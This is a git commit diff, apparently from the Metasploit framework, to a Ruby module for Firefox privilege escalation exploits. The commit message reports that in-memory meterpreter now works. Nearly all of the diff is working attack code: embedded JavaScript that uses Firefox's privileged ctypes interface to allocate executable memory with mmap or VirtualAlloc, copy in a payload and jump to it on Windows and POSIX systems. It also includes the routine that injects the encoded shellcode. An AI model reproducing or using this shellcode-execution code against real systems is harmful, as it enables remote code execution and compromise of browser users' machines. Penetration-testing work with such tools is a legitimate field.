All working now. In-memory meterpreter even.
parent
26db845438
commit
9bdf570763
|
@ -15,30 +15,26 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
|
|||
# @return [String] javascript code containing the execShellcode() javascript fn
|
||||
def exec_shellcode_source
|
||||
%Q|
|
||||
var execShellcode = function(shellcode) {
|
||||
var execShellcode = function(shellcode, bytes) {
|
||||
Components.utils.import("resource://gre/modules/ctypes.jsm");
|
||||
var execPosix = function() {
|
||||
var RWX = 7, ANON_PRIVATE = 4098;
|
||||
Components.utils.import("resource://gre/modules/ctypes.jsm");
|
||||
var LIBS = [
|
||||
"C:\\\\WINDOWS\\\\system32\\\\user32.dll",
|
||||
"/usr/lib/libSystem.B.dylib",
|
||||
"libc.so.6",
|
||||
"libc.so"
|
||||
];
|
||||
|
||||
Components.utils.import("resource://gre/modules/ctypes.jsm");
|
||||
var openLibs = function(libs) {
|
||||
var i, lib;
|
||||
for (i in libs) {
|
||||
for (i in LIBS) {
|
||||
try {
|
||||
lib = ctypes.open(libs[i]);
|
||||
return lib;
|
||||
lib = ctypes.open(LIBS[i]);
|
||||
break;
|
||||
} catch (e) {}
|
||||
}
|
||||
};
|
||||
|
||||
var lib = openLibs(LIBS);
|
||||
if (!lib) throw new Error("Could not find lib in ["+LIBS+"]");
|
||||
|
||||
var execPosix = function() {
|
||||
var RWX = 7, ANON_PRIVATE = 4098;
|
||||
var mmap = lib.declare('mmap',
|
||||
ctypes.default_abi, /* calling convention */
|
||||
ctypes.voidptr_t, /* return type */
|
||||
|
@ -56,28 +52,21 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
|
|||
ctypes.voidptr_t, /* src */
|
||||
ctypes.size_t /* size to copy */
|
||||
);
|
||||
var pthread_create = lib.declare('pthread_create',
|
||||
ctypes.default_abi, /* calling convention */
|
||||
ctypes.int, /* return type */
|
||||
ctypes.voidptr_t, /* buffer to store thread struct */
|
||||
ctypes.voidptr_t, /* NULL */
|
||||
ctypes.voidptr_t, /* fn ptr */
|
||||
ctypes.voidptr_t /* NULL */
|
||||
);
|
||||
|
||||
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
|
||||
var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0);
|
||||
var bytes = encodeURI(shellcode).split(/%..\|./).length - 1;
|
||||
memcpy(buff, ctypes.jschar.array()(shellcode), bytes);
|
||||
var cstr = ctypes.jschar.array()(shellcode);
|
||||
//var bytes = ctypes.char.array()(shellcode).length-1;
|
||||
memcpy(buff, cstr, bytes);
|
||||
/* there is probably a better way to do this */
|
||||
var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
|
||||
if (!m) throw new Error("Could not find address of buffer.");
|
||||
var fn = ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
|
||||
//pthread_create(pthread_buff, )
|
||||
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
|
||||
};
|
||||
|
||||
var execWindows = function() {
|
||||
var RWX = 0x40, ANON_PRIVATE = 0x1000;
|
||||
var VirtualAlloc = lib.declare('VirtualAlloc',
|
||||
var VirtualAlloc = ctypes.open("Kernel32.dll").declare('VirtualAlloc',
|
||||
ctypes.winapi_abi, /* calling convention */
|
||||
ctypes.voidptr_t, /* return type */
|
||||
ctypes.voidptr_t, /* start address (NULL here) */
|
||||
|
@ -85,22 +74,22 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
|
|||
ctypes.unsigned_long, /* alloc type */
|
||||
ctypes.unsigned_long /* protection flags */
|
||||
);
|
||||
var memcpy = lib.declare('memcpy',
|
||||
var memcpy = ctypes.open("ntdll.dll").declare('memcpy',
|
||||
ctypes.winapi_abi, /* calling convention */
|
||||
ctypes.voidptr_t, /* return type */
|
||||
ctypes.voidptr_t, /* dest */
|
||||
ctypes.voidptr_t, /* src */
|
||||
ctypes.size_t /* size to copy */
|
||||
);
|
||||
var buff = VirtualAlloc(null, shellcode.length, WIN.ANON_PRIVATE, WIN.RWX);
|
||||
var bytes = encodeURI(shellcode).split(/%..\|./).length - 1;
|
||||
memcpy(buff, ctypes.jschar.array()(shellcode), bytes);
|
||||
var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
|
||||
var cstr = ctypes.jschar.array()(shellcode);
|
||||
memcpy(buff, cstr, bytes);
|
||||
var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/);
|
||||
if (!m) throw new Error("Could not find address of buffer.");
|
||||
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
|
||||
ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
|
||||
};
|
||||
|
||||
var i, errs = [], fns = [execPosix, execWindows];
|
||||
var i, errs = [], fns = [execWindows, execPosix];
|
||||
for (i in fns) {
|
||||
try {
|
||||
fns[i](shellcode);
|
||||
|
@ -116,12 +105,13 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
|
|||
# @return [String] javascript source code that kicks off the execution of the payload
|
||||
# For a javascript payload, this simply returns the payload source
|
||||
# For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode
|
||||
# foreverwhile"\xeb\xfe"
|
||||
def run_payload
|
||||
return payload.encoded if js_target?
|
||||
%Q|
|
||||
#{exec_shellcode_source}
|
||||
var sc = unescape("#{Rex::Text.to_unescape("\xcc"+payload.encoded+"\xc3")}");
|
||||
execShellcode(sc);
|
||||
var sc = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
|
||||
execShellcode(sc, #{payload.encoded.bytes.to_a.length});
|
||||
|
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue